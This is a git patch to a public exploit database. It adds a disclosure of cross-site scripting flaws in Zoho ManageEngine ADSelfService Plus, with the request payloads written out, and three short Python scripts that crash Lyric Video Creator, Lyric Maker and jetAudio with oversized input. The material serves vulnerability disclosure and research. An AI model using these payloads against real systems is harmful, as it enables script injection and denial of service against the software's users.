From 61e7eefac4177edca8a5a1121f9126375c2cc043 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 10 May 2019 05:02:01 +0000 Subject: [PATCH] DB: 2019-05-10 4 changes to exploits/shellcodes Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC) Lyric Maker 2.0.1.0 - Denial of Service (PoC) Convert Video jetAudio 8.1.7 - Denial of Service (PoC) Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting --- exploits/php/webapps/46815.txt | 50 ++++++++++++++++++++++++++++++++++ exploits/windows/dos/46816.py | 19 +++++++++++++ exploits/windows/dos/46817.py | 22 +++++++++++++++ exploits/windows/dos/46818.py | 22 +++++++++++++++ files_exploits.csv | 4 +++ 5 files changed, 117 insertions(+) create mode 100644 exploits/php/webapps/46815.txt create mode 100755 exploits/windows/dos/46816.py create mode 100755 exploits/windows/dos/46817.py create mode 100755 exploits/windows/dos/46818.py diff --git a/exploits/php/webapps/46815.txt b/exploits/php/webapps/46815.txt new file mode 100644 index 000000000..364383dd4 --- /dev/null +++ b/exploits/php/webapps/46815.txt @@ -0,0 +1,50 @@ +[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting +[+] Author: Ibrahim Raafat +[+] Twitter: https://twitter.com/RaafatSEC +[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html? + + +[+] TimeLine + [-] Nov 23, 2018 Reported + [-] Nov 26, 2018 Triaged + [-] Dec 27, 2018 Fixed + [-] May 08, 2019 Public Disclosure + +[+] Description: + Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites + +[+] POC + +[-] Employee search form + +POST /EmployeeSearch.cc?actionId=Search HTTP/1.1 + +searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf= +searchType parameter: +searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf= + + +2- Employee Search – ascending parameter + +/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1 + +selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf= + + +3- EmpSearch.cc - searchString parameter + +POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1 + +&adscsrf= + +4- Stored XSS in self-update layout implementation. + +/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields +Insert the following payload into Mobile Number field, and save +Payload: 11111111]";a=alert,a(31337)// +Code execute here: +/Enrollment.do?selectedTab=Enrollment + + +[+] Assigned CVE: CVE-2018-20484,CVE-2018-20485 +[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html \ No newline at end of file diff --git a/exploits/windows/dos/46816.py b/exploits/windows/dos/46816.py new file mode 100755 index 000000000..3c65f41f0 --- /dev/null +++ b/exploits/windows/dos/46816.py @@ -0,0 +1,19 @@ +# -*- coding: utf-8 -*- +# Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC) +# Date: 08/05/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: https://lyricvideocreator.com/ +# Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe +# Version: 2.1 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3" +# 2.- Open LyricVideoCreator.exe +# 4.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button +# 5.- Crashed + +buffer = "\x41" * 5000 +f = open ("sample.mp3", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46817.py b/exploits/windows/dos/46817.py new file mode 100755 index 000000000..b01884ca4 --- /dev/null +++ b/exploits/windows/dos/46817.py @@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC) +# Date: 08/05/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: http://www.jetaudio.com/ +# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe +# Version: 2.0.1.0 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt" +# 2.- Copy the text from the generated LyricMaker.txt file to clipboard +# 3.- Open JetLyric.exe or Lyric Maker +# 4.- Paste clipboard in in the field "Title" +# 5.- Go to file -> Save Lyric... +# 6.- Save the file with any name, e.g 'sample.jlr' +# 7.- Crashed + +buffer = "\x41" * 5000 +f = open ("LyricMaker.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46818.py b/exploits/windows/dos/46818.py new file mode 100755 index 000000000..1c163b3ed --- /dev/null +++ b/exploits/windows/dos/46818.py @@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +# Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC) +# Date: 08/05/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: http://www.jetaudio.com/ +# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe +# Version: 8.1.7 +# Tested on: Windows 10 + +# Proof of Concept: +# 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt" +# 2.- Copy the text from the generated ConvertVideo.txt file to clipboard +# 3.- Open JetVidCnv.exe or Video Converter +# 4.- Click on the 'Add Files...' button and select a video file +# 5.- Paste clipboard in in the field "File Naming" +# 6.- Click on the 'Preview' button +# 7.- Crashed + +buffer = "\x41" * 512 +f = open ("ConvertVideo.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 25a2fabd3..5ef1b02b1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6411,6 +6411,9 @@ id,file,description,date,author,type,platform,port 46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios, 46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows, 46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows, +46816,exploits/windows/dos/46816.py,"Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows, +46817,exploits/windows/dos/46817.py,"Lyric Maker 2.0.1.0 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows, +46818,exploits/windows/dos/46818.py,"Convert Video jetAudio 8.1.7 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -41241,3 +41244,4 @@ id,file,description,date,author,type,platform,port 46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80 46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux, +46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php,